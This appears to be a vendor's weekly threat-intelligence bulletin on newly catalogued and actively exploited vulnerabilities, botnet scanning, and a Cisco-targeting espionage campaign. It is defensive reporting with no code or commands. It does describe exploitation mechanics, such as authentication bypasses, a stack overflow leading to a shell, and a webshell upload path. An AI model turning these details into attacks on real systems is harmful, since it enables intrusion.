The week saw heightened threat activity across multiple fronts, with new vulnerabilities and active exploitation campaigns emerging globally.

CISA added six new vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, including two from Kentico Xperience CMS, and one each from Microsoft Windows, Oracle E-Business Suite, Apple, and MOTEX LANSCOPE, signaling diverse exploitation across enterprise and consumer ecosystems.

Active exploitation was also observed in WatchGuard Fireware OS and Adobe Commerce/Magento Open Source, where attackers leveraged remote code execution and session takeover vulnerabilities despite available patches.

Meanwhile, botnet operations surged worldwide, with EnemyBot, Sysrv-k, Andoryu, and Androxgh0st exploiting weaknesses in GitLab, cloud gateways, and PHP applications. IoT-targeting botnets such as Mirai, Bashlite, Tsunami, and BrickerBot intensified attacks on EirD1000 routers, aiming for persistence and lateral network movement.

TrendMicro has observed a cyberespionage campaign dubbed, Operation Zero Disco targeting network infrastructure, using Cisco SNMP and modified Telnet flaws to deploy Linux rootkits and enable memory manipulation

Key points

• 6 new vulnerabilities were added to the CISA Known Exploited Vulnerabilities (KEV) catalog, reflecting recent exploitation activity.  
• 2 additional vulnerabilities were confirmed as actively exploited in the wild during the week.  
• Cytellite sensor telemetry detected exploit and botnet-driven scanning activity targeting globally exposed assets.  
• 2 vulnerabilities were identified as being exploited by active malware campaigns, indicating weaponization by threat actors.  
• Multiple PRE-NVD vulnerabilities were observed, suggesting potential exploitation prior to public disclosure.

Several high-impact vulnerabilities are currently trending across the cybersecurity community, demanding immediate attention and patch prioritization. Monitoring these emerging and widely discussed threats provides valuable insights, enabling organizations to make informed security decisions and strengthen their overall defense posture.

CVE-2025-2746
An Authentication Bypass Using an Alternate Path or Channel vulnerability in Kentico Xperience CMS affecting versions up to and including 13.0.172 can allow an attacker to control administrative objects; Kentico remediated the issue with hotfix 13.0.173 released on January 30, 2025. According to WatchTowr Labs, the flaw exists in the Staging/Sync Server’s digest authentication path where, when an invalid or missing username is supplied, the service improperly returns an empty password string effectively treating an empty SHA-1 hash as valid allowing a remote attacker who can reach the staging endpoint to bypass the password check, gain authenticated access, and potentially perform administrative actions leading to follow-on remote code execution. The vulnerability has been added to the CISA KEV catalog.  

‍CVE-2025-2747
An Authentication Bypass Using an Alternate Path or Channel vulnerability in Kentico Xperience allows a remote attacker to gain unauthorized administrative control over system objects. The issue affects versions prior to 13.0.178, and Kentico addressed it by releasing hotfix 13.0.178 on March 6, 2025. According to WatchTowr Labs, the flaw resides in the Staging/Sync Server component and stems from WSE 3.0’s improper handling of the UsernameToken “SendNone” option, which allows an attacker to send a SOAP request containing a valid username but no password and still be authenticated successfully. This bypass grants the attacker administrative access, potentially leading to remote code execution and full system compromise. The vulnerability has now been added to the CISA KEV catalog.

CVE-2025-9242
An Out-of-bounds Write vulnerability in WatchGuard Fireware OS affecting 11.10.2 through 11.12.4_Update1, 12.0 through 12.11.3, and 2025.1. allows a remote, unauthenticated attacker to execute arbitrary code; apart from EOL 11.x releases, WatchGuard has published updated Fireware OS builds to remediate the issue. Technical analysis by WatchTowr Labs shows the flaw resides in the ike2_ProcessPayload_CERT routine (src/ike/iked/v2/ike2_payload_cert.c), where an unchecked client “identification” copy into a 520-byte stack buffer can be triggered during the IKE_SA_AUTH phase (pre-certificate validation), enabling a pre-auth stack overflow and remote code execution that can be weaponized to gain control of the instruction pointer, spawn an interactive Python shell via mprotect(), and escalate to a full Linux shell. Shadowserver estimates ~73,000 exposed WatchGuard instances worldwide (≈24,000 in the U.S.), and WatchGuard updated its advisory on 21 October to confirm evidence of active exploitation.

CVE-2025-33073
An Improper Access Control vulnerability in the Microsoft Windows SMB Client could allow privilege escalation to SYSTEM level. According to Microsoft, the flaw lies in the SMB protocol's access control mechanism, which can be exploited by a network-based, authenticated attacker to gain elevated privileges. In a high-risk scenario, an adversary could operate a malicious SMB server that tricks a user or application into connecting and authenticating, after which specially crafted payloads exchanged during the session could subvert the protocol, enabling unauthorized data access, system modifications, or complete system takeover. Public proof-of-concept for this vulnerability further increases the likelihood of exploitation. Although patched by Microsoft in June 2025, the flaw has now been added to the CISA KEV catalog.

CVE-2025-54236
An Improper Input Validation vulnerability in Adobe Commerce and Magento Open Source enables session takeover and remote code execution via a nested deserialization flaw in the Commerce REST API. Although Adobe issued a hotfix in September 2025, Sansec has recently observed active exploitation recording over 250+ attack attempts in 24 hours, with adversaries uploading PHP webshells via /customer/address_file/upload and probing phpinfo for configuration data. Current telemetry shows ~62% of Magento stores remain unpatched, leaving a large attack surface exposed. Immediate application of Adobe’s security update or recommended mitigations is strongly advised to prevent account takeover, webshell deployment, and full store compromise.

CVE-2025-61884
A pre-authentication Server-Side Request Forgery (SSRF) vulnerability in Oracle E-Business Suite Configurator, affecting versions 12.2.3 through 12.2.14, allows an unauthenticated HTTP attacker to retrieve or manipulate sensitive configuration data. Oracle released an emergency patch introducing strict validation of the return_url parameter using a regular expression to block injected CRLF sequences and mitigate the exploit. Following the leak of public proof-of-concept by the ShinyHunters extortion group, the risk of active exploitation has significantly increased. The vulnerability has now been added to the CISA KEV catalog, and organizations are strongly urged to apply Oracle’s update immediately and review any externally exposed E-Business Suite instances for potential compromise.

CVE-2025-61932
A Remote Code Execution (RCE) vulnerability in LANSCOPE Endpoint Manager (On-Premises) affects the Client Program (MR) and Detection Agent (DA) components in versions 9.4.7.1 and earlier. MOTEX has released updated builds to remediate the issue. According to MOTEX, the flaw arises from improper verification of communication channel sources and is actively exploited in the wild, with at least one confirmed case of a targeted customer. JPCERT/CC further explains that a specially crafted packet can trigger arbitrary code execution in the affected products without any user interaction. This vulnerability presents a serious threat to enterprise environments where Lanscope agents operate across distributed endpoints, as successful exploitation could allow an attacker to execute malicious code with system-level privileges, potentially resulting in network compromise, data theft, or ransomware deployment. The vulnerability has now been added to the CISA KEV catalog.

CVE-2022-48503
An Unspecified vulnerability in Apple multiple products, including macOS, iOS, iPadOS, tvOS, watchOS, and Safari, could allow arbitrary code execution when processing malicious web content. According to Apple, the issue stems from improper validation of an array index within the JavaScriptCore engine, which can trigger out-of-bounds behavior leading to code execution. Apple resolved the vulnerability by implementing improved bounds checks in WebKit, releasing patches across tvOS 15.6, watchOS 8.7, iOS 15.6, iPadOS 15.6, macOS Monterey 12.5, and Safari 15.6. Although already patched in 2022, this vulnerability has now been added to the CISA KEV catalog.

Cytellite telemetry captured active exploit attempts and mass scanning campaigns against exposed services globally. The data highlights which vulnerabilities are under attack and provides source IPs and payloads to authorized teams for detailed threat analysis and validation.

Multiple vulnerabilities were actively exploited by botnets, demonstrating automated infection and propagation across vulnerable systems. Analysis of MISP logs identified the top CVEs targeted by botnets, with payloads indicative of botnet activity, such as using wget commands with specific IP addresses, highlighting ongoing automated exploitation campaigns.

Active malware campaigns exploited specific vulnerabilities to deliver payloads and carry out post-exploitation actions. Each targeted vulnerability is proactively monitored, manually analyzed, and mapped to MITRE ATT&CK tactics and techniques. Insights are derived from the LOVI vulnerability intelligence platform, which aggregates and curates data from multiple sources, OSINT groups, blogs, and data leak sites.  

CVE-2025-20352 and CVE-2017-3881
According to Trend Micro, attackers have been exploiting the Cisco SNMP vulnerability, CVE-2025-20352 to deploy Linux-based rootkits as part of a campaign named Operation Zero Disco, on older and unprotected Cisco 9400, 9300, and legacy 3750G series devices, enabling remote code execution and persistent unauthorized access. The implanted malware establishes a universal password containing the term "disco", a one-letter variation of "Cisco" and installs multiple hooks into the IOSd memory space, resulting in fileless persistence that vanishes after reboot. The campaign also attempted to exploit a modified Telnet vulnerability derived from CVE-2017-3881, altering it to enable memory read and write capabilities rather than standard RCE. While newer switch models benefit from Address Space Layout Randomization (ASLR), which limits exploitation success, repeated intrusion attempts can still overcome these mitigations, posing a significant risk to legacy and misconfigured network infrastructure.

PRE-NVD vulnerabilities refer to security flaws that are discovered, discussed, or even exploited in the wild before their official inclusion in the National Vulnerability Database (NVD). These early-stage vulnerabilities often emerge through threat actor chatter, exploit proof-of-concepts, and technical disclosures shared across social media platforms and underground forums, signaling potential exploitation risks before public awareness.

The week’s developments highlight a concerning trend of rapid vulnerability weaponization and coordinated exploitation across diverse platforms. From enterprise software flaws to IoT and network infrastructure attacks, adversaries are demonstrating increasing agility in leveraging unpatched systems. Active exploitation and espionage campaigns underscores the urgent need for timely patching and continuous threat visibility. Loginsoft Vulnerability Intelligence (LOVI) equips organizations with actionable context to stay ahead of evolving exploitation campaigns and strengthen their defensive posture.